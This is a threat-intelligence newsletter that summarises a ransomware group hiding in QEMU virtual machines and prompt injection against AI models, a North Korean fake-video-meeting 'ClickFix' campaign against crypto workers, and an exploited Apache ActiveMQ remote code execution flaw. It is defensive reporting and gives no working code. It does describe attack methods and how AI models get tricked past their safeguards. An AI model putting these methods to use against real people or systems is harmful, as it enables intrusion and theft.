Ankura CTIX FLASH Update – April 21, 2026

Malware Activity

From Ransomware to AI: Why Trust Is the New Target

Recent reporting highlights a shared theme across both ransomware operations and attacks on artificial intelligence: attackers are increasingly exploiting trusted systems rather than breaking them. The Payouts King ransomware group demonstrates this by abusing QEMU, a legitimate virtualization tool, to quietly run hidden Linux virtual machines that security software cannot see, giving attackers long‑term, stealthy access to compromised systems. In parallel, AI systems face a similar challenge through prompt injection attacks, where malicious instructions are hidden inside seemingly legitimate content to trick models into revealing information or bypassing safeguards. In both cases, the technology behaves as designed. Virtual machines isolate environments, and AI models follow instructions in good faith. This makes the problem especially difficult to eliminate with technical controls alone. Together, these stories underscore a growing reality in cybersecurity: threats are increasingly rooted in abuse of trust and normal behavior, not obvious malware. As a result, defenders must focus on visibility, monitoring, user awareness, and containment, rather than assuming any tool (human or machine) can be made completely immune to deception.

• BleepingComputer: Payouts King Ransomware Uses QEMU VMs to Bypass Endpoint Security article
• TheRegister: Just Like Phishing For Gullible Humans, Prompt Injecting AIs Is Here to Stay article

Threat Actor Activity

North Korean Hackers Use Fake Video Meetings to Target Crypto and Web3 Professionals

North Korea-linked threat actor UNC1069 is running a highly targeted campaign against cryptocurrency and Web3 professionals by abusing fake Zoom, Google Meet, and Microsoft Teams meetings across Windows, macOS, and Linux. UNC1069, which overlaps with Bluenoroff/CryptoCore, impersonates venture capital and investment firms, often hijacking real accounts and continuing existing conversations before scheduling “due diligence” calls via services like Calendly. Victims are lured to convincing fake meeting portals that may display AI-generated or replayed video of executives. During the call, attackers cite audio/video issues or missing components and guide victims through a “ClickFix”-style process, instructing them to open a terminal or elevated PowerShell window and paste attacker-supplied commands. On Windows, these commands chain PowerShell and obfuscated VBScript payloads, disable protections, and install Cabbage RAT variants. On macOS, terminal commands fetch fake Zoom/system binaries that bypass Gatekeeper and deploy NukeSped RAT; Linux victims are given curl-based scripts that pull ELF downloaders and a second-stage RAT aligned with Cabbage. The fake meeting portals also act as surveillance tools, using browser APIs and WebRTC to capture audio and video for reuse or deepfakes. UNC1069 maintains a large infrastructure of lookalike meeting and fake VC domains and has also been tied to supply-chain attacks like the Axios npm compromise. CTIX Analysts recommend protective measures such as strict bans on pasting commands during calls, out-of-band verification of counterparties, monitoring for suspicious scripting activity, and enforcing least-privilege access to wallet infrastructure.

• GB Hackers: UNC1069 Campaign Article

Vulnerabilities

CISA Warns of Actively Exploited 13-Year-Old Apache ActiveMQ RCE Flaw

\Apache ActiveMQ is facing renewed scrutiny after the U.S. Cybersecurity and Infrastructure Security Agency (CISA) added CVE-2026-34197 to its Known Exploited Vulnerabilities (KEV) catalog, giving federal agencies until no later than April 30, 2026, to patch under Binding Operational Directive 22-01. The flaw, which had reportedly existed unnoticed for thirteen (13) years, allows attackers to achieve remote code execution (RCE) through ActiveMQ’s exposed Jolokia management API by forcing the broker to load a malicious remote Spring XML configuration file. Although the vulnerability technically requires authentication, many environments still use default credentials such as “admin:admin,” making exploitation relatively easy. In certain ActiveMQ versions between 6.0.0 and 6.1.1, the flaw can even become fully unauthenticated when chained with CVE-2024-32114, which exposes the Jolokia API without login requirements. Security researchers noted that more than 8,000 internet-facing ActiveMQ instances remain exposed, increasing the likelihood of continued exploitation. Organizations are being urged to immediately upgrade to patched versions 5.19.5 or 6.2.3, restrict access to the Jolokia API and web console, eliminate default credentials, and closely monitor logs for suspicious broker configuration activity. CTIX analysts strongle urge any affected entities to ensure they patch their vulnerabilities and follow the mitigation instructions to prevent exploitation.

• The Register: CVE-2026-34197 Article

The content of this article is intended to provide a general guide to the subject matter. Specialist advice should be sought about your specific circumstances.